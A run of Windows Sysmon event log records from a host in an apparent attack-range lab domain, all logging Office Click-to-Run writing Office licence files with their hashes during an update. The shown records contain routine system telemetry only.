14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest2-ppd.xrm-msMD5=D744153600B318D0951047527D4B2771,SHA256=C511B683CC38908C8F2B39EEF5424BCD1AF51CFA27401CB20E7CC4D7673F62D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest2-pl.xrm-msMD5=BDBEB5F98EC1902F26C53D2E097FC7A6,SHA256=F43450E28DAFE497C4BF1E4F0DEA4EEFD4BEB51E2C18AB550283EED8BAC987B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest-ul-oob.xrm-msMD5=238438A6F43B9F2549FAB5F6D92D728D,SHA256=230976F653CCFA5567C3C4EDE39EE0D8B808108481DCCF437EA579747FE6A3DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest-ppd.xrm-msMD5=F0250B771F2776E65BC97B6B1B2E6238,SHA256=197249B89975C8CD765D1C66FF7DF37D37DA79989EDF57E783B42253233711C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest-pl.xrm-msMD5=4F30284E2965016334D60F7893069E39,SHA256=E681FF574B4DF543E66276FD27717A16C3756B9E9A9F357B8E23BF1C307D8D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-msMD5=30725C1CC030480396426AE223DCA6B2,SHA256=CA4A4B3673BF84A7AA5F68F43FFF95E28079C2B40BA001BA1FC9D9DC892AD65C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription2-ppd.xrm-msMD5=309155A36549C634B90B5D36BB704316,SHA256=F7054961C45932A08F90BC0D2251CF79AD9E33A09BEFA2FAB9CBD099823E9246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription2-pl.xrm-msMD5=4999E4A336A0B0836E095DAB056EF442,SHA256=06C3AD9EF3BBE575E4422F2BD93FE8186087C8EC405333E6891F7D21A024B608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription-ul-oob.xrm-msMD5=B05910AE4B923CB7FC44ABABC6D3C312,SHA256=6485F923ACBF48EFD52D6557A69BB94139D28CE2EBE8F2A44FBE9520CBEEA8D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription-ppd.xrm-msMD5=3C8571D7B02D9FA0327D3E05B3A3B477,SHA256=7B84CC7357A92658521BA447FBC3041829C82A22CE7780E0546D441A3CFD9AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Subscription-pl.xrm-msMD5=F167A35E04509EF5778DA334369ACEF9,SHA256=E1888D68E1C0E4D6DAA0830F59B93F5DC5D5F7C0B46CCE3AB5E180715B003E4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Retail-ul-phn.xrm-msMD5=4F19DE46181041F90E5E24E3742F6E5D,SHA256=5CB12112968F1AE50E20CF6CA1727D59F06A841E89C820F34F9F8C698C859D19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Retail-ul-oob.xrm-msMD5=146A943A686718ACA86EDE6842143905,SHA256=AA0CDCE88A6D895FE766EDE8B280AFDC1EE2AC96D2774BA503745B474F9333A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Retail-ppd.xrm-msMD5=A9508F50CDF5C16D303E28B57CA194DD,SHA256=3EB371F6DF454D76F27340829DB82297735BDF69CE8C8473104E7468A7B809D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Retail-pl.xrm-msMD5=924D97D1C8F3AAD9B852C3B4201F4648,SHA256=8EEE44C88F6482697F38D886AEB4948EA73238047EBA152651F1C6AA727438FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_OEM_Perp-ul-phn.xrm-msMD5=F4B3AFD502D470EABD255A91EE3D0062,SHA256=91196C155CF218E430A4E20ED0744B558C347EA2A1E4202B8F9829E50BABEED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-msMD5=85FF5F62517DAE67F84382E6AFE3079C,SHA256=3F9CBECCEDDB9370A0F0FA6482A643A0BEEA3172E488E2508171A3BB89458A50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_OEM_Perp-ppd.xrm-msMD5=DBD5C4FF5E9087591AA5E1EAC3D42A2E,SHA256=6546E25CF546881E36AC64F98C55975EC59436500227B3EAF4629CB768A34ED7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_OEM_Perp-pl.xrm-msMD5=59F28EEA82B49CC928516DE70ABF1F5A,SHA256=6EFD4FECB2F8F88369F088B16C5058CD714E86EDBA193E48F19A41EB77036FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ul-oob.xrm-msMD5=B20CF9F0916338F3F12B487F6FBBA467,SHA256=A1FF8F693DD88ED9A089DFAF374008BC0A8185F73D142F86CCBE879DB3DE8F11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-msMD5=73DFD878A155BAF4FE5AAE2CD659A1C5,SHA256=7923C8A3CD1687957AA731E7B096A582EA871668FD272CBB507D765C70E9A472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-msMD5=CD9026112401712799BE9E8094823184,SHA256=E40EC5D00A964C66BB836532BADA3B1232849C70783B455FF9C84923F79C12E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ppd.xrm-msMD5=9798BB136EDD97D4427F5C12FEA38F1F,SHA256=742FF8FCA21695F1342BE8CA4F6DA1EFE9671F2044417FB47F9C344C9178C7EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ul-oob.xrm-msMD5=33257EC51502676A2F783857C6932EDA,SHA256=962CD6BC0722E3A11CED424D207C143EBD79AD5D25F17E1055321C849033B462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ppd.xrm-msMD5=B829A083972FF117E7E378B6F843386F,SHA256=00C5F570A67CB439FB59B0C9F76E274DB9DA4E2106B4354E0F6CBDD153773257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_KMS_Automation-ul.xrm-msMD5=F242441578F1F48A399AD09724AED979,SHA256=BC27127B210526466EF93E1A783786EC4B5F791F1FBF271F19444818B2F22540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_KMS_Automation-ul-oob.xrm-msMD5=0B8C821EC65BB6BD7FFDDA07EDAC7518,SHA256=7AD42E3143229D03A283648DC7EA7E1820D756EAE895964489C8174A5C83A4BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_KMS_Automation-ppd.xrm-msMD5=95A46E9BF379012F34FC8B2C9240D0E2,SHA256=3D76B5D4D442B0CFF32F6B7087F473D4B3A9CDA211A96580ED20E0C8FA25BF3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Grace-ul-oob.xrm-msMD5=AE2E010693B570B27EB36633F0D5800B,SHA256=7A66278EAFF7CEC183AB574E6FBA0BFC88C5B755F9605D136BBB6CF5F4E5A65E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Grace-ppd.xrm-msMD5=8295B740E7988ACFD891B8D1C238A463,SHA256=E41F3CCEA95D2753856BC846966CCB6B26B8EB9F487F376AC15950F74A595BE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ul-oob.xrm-msMD5=508AD29EE7BC010015ABB22A601AC8E4,SHA256=700AC876D7D55719B2888D7887A586900C0CE28696FDCD256351330A92982455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-msMD5=6C8C5CACCF1AA5708666FEA9409E1BDF,SHA256=F59E8296E9C205937418A3ECFA02352104DE0162581869416FECFC1E97123CB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-msMD5=E5971E9DF84952EF08FA3EB0912A349B,SHA256=8755C78E6C7A43550D8A99D1A6CDE6F6EB9D7534EB99091096271621297B24A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-msMD5=774B0C57ADD95026CE47E131EF9E8AED,SHA256=476E6E2EAAC463047BF352A52741A019846092C652D14B8DE521F43EB9346BB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_BypassTrial180-ul-oob.xrm-msMD5=48D8AB346FC8797B82C55ADAA00FFBE0,SHA256=10104032E80EA9ECD7886436876AAE88CDDCD4E9166851A83B268F7B822A75C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_BypassTrial180-ppd.xrm-msMD5=EDBBBA94213AFCF394D3B7C48644D9AB,SHA256=5533B5B36AFA400B69496D89F782044655038399F7D77F171E887BA48DE37A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-msMD5=7F6F5EF8C809C4067C65D0C49C4DD90E,SHA256=0008FFC36082A3E41D14572887B2CBB43286641CBC922B30A17DFCF5F1C1B34E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Trial-ppd.xrm-msMD5=5C8652E27F71A421AF2E402B61B0E51E,SHA256=1772D9425F7DB9EB8037E86E41B53CD5C854EB12539C4E23B5CD802823FB65C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Trial-pl.xrm-msMD5=020597EBA9642C8449A52F5A78C9900E,SHA256=E913B81FBAC7D18E16DCDFC4EFC446249E1D6ECB093693FEED7998D8AD63D732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Retail-ul-phn.xrm-msMD5=610F777D54043F965F470CBC55EA28C2,SHA256=1486857524FBF8F940F1CF6CED141468821947E37078160D594DC0F9936FC019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Retail-ul-oob.xrm-msMD5=907E883B2FF196050AA617D2BD1A7FE8,SHA256=C9CA1897309697A01017384E277BC1C84CF451BD1F11EA7A5FF6477D77654126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-msMD5=F5CB16F40B239AA16B1912902420AD07,SHA256=608B81A15D0BCB103F8438FE03E4D4030C33E61B95AD6C8AF2C5F086DE75B1DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Retail-pl.xrm-msMD5=A8828AADB0059439BD028256E630FE51,SHA256=290608221D336934CE6A8A7B2F06AE7D22024DE5034EB0ED548D97FC256BE41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-msMD5=0A0421CCF47D0FC6F9E50C8EEFA93216,SHA256=5FC04274244B4DAAF9D51AD3BA04FB62DA6CB1172576EBD90DE541FC2319099D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT 